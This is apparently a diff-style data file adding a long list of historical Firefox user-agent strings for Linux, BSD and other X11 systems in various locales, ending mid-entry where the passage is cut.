+Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061417 Gentoo Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.16) Gecko/2009121609 Firefox/3.0.6 (Windows NT 5.1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.17) Gecko/2010011010 Mandriva/1.9.0.17-0.1mdv2009.1 (2009.1) Firefox/3.0.17 GTB6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072610 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072820 Kubuntu/8.04 (hardy) Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008110312 Gentoo Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 (Linux Mint) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.4) Gecko/2008120512 Gentoo Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121806 Gentoo Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122010 Firefox/2.0.0.3 (Debian-3.0.5-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122014 CentOS/3.0.5-1.el4.centos Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122120 Gentoo Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122406 Gentoo Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-1.4 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020407 Firefox/3.0.4 (Debian-3.0.6-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020519 Ubuntu/9.04 (jaunty) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2010012717 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 GTB5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030719 Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030810 Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva/1.9.0.7-0.1mdv2009.0 (2009.0) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031802 Gentoo Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032319 Gentoo Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032606 Red Hat/3.0.7-1.el5 Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1.1 Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1 Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032713 Ubuntu/9.04 (jaunty) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032908 Gentoo Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009040312 Gentoo Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090312 Firefox/3.1b3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 GNU/Linux/x86_64 Firefox/3.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-3.el4 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.20) Gecko/20110804 Red Hat/3.6-2.el5 Firefox/3.6.20 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9a1) Gecko/20060112 Firefox/1.6a1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008011321 Firefox/3.0b3pre +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008020509 Firefox/3.0b3pre +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008031318 Firefox/3.0b4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008040813 Firefox/3.0b4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008041816 Fedora/3.0-0.55.beta5.fc9 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008061317 (Gentoo) Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062315 (Gentoo) Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9pre) Gecko/2008042312 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.4) Gecko/2008110510 Red Hat/3.0.4-1.el5_2 Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061015 Ubuntu/8.04 (hardy) Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061017 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009072711 CentOS/3.0.12-1.el5.centos Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.7) Gecko/2009022800 SUSE/3.0.7-1.4 Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101026 SUSE/3.6.12-0.7.1 Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.14) Gecko/2009090217 Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.16) Gecko/20080715 Fedora/2.0.0.16-1.fc8 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.3) Gecko/20070322 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8) Gecko/20051231 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.19) Gecko/2010051407 CentOS/3.0.19-1.el5.centos Firefox/3.0.19 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-1.1 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9) Gecko/2008061017 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64) Gecko/2008072820 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; hu; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc7 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092813 Gentoo Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729) +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.20) Gecko/20110805 Ubuntu/10.04 (lucid) Firefox/3.6.20 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.24) Gecko/20111101 SUSE/3.6.24-0.2.1 Firefox/3.6.24 +Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9) Gecko/2008061017 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16 +Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4 +Mozilla/5.0 (X11; U; Linux x86_64; ko-KR; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.2 Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; nl-NL; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.1.2pre) Gecko/20061023 SUSE/2.0.0.1-0.1 Firefox/2.0.0.2pre +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8) Gecko/20051128 SUSE/1.5-0.1 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu (hardy) Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu/hardy Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.5) Gecko/2008121623 Ubuntu/8.10 (intrepid) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9) Gecko/2008060309 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:2.0) Gecko/20110307 Firefox/4.0 +Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.8.1.4) Gecko/20070611 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.8.1.7) Gecko/20071009 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9b5) Gecko/2008041515 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 (.NET CLR 3.5.30729) +Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11 +Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18 +Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 GTB5 +Mozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux x86; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/8.04 (hardy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Mac OSX; it; rv:1.9.0.7) Gecko/2009030422 Firefox/3.0.7 +Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8.1.6) Gecko/20080115 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; NetBSD amd64; fr-FR; rv:1.8.0.7) Gecko/20061102 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.5) Gecko/20060818 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8) Gecko/20060104 Firefox/1.5 +Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12 +Mozilla/5.0 (X11; U; NetBSD sparc64; fr-FR; rv:1.8.1.6) Gecko/20070822 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.8.0.9) Gecko/20070101 Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.8.1.6) Gecko/20070817 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.9.0.1) Gecko/2008081402 Firefox/3.0.1 +Mozilla/5.0 (X11; U; OpenBSD i386; de-DE; rv:1.8.1.6) Gecko/20080429 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.7.10) Gecko/20050919 (No IDN) Firefox/1.0.6 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.1) 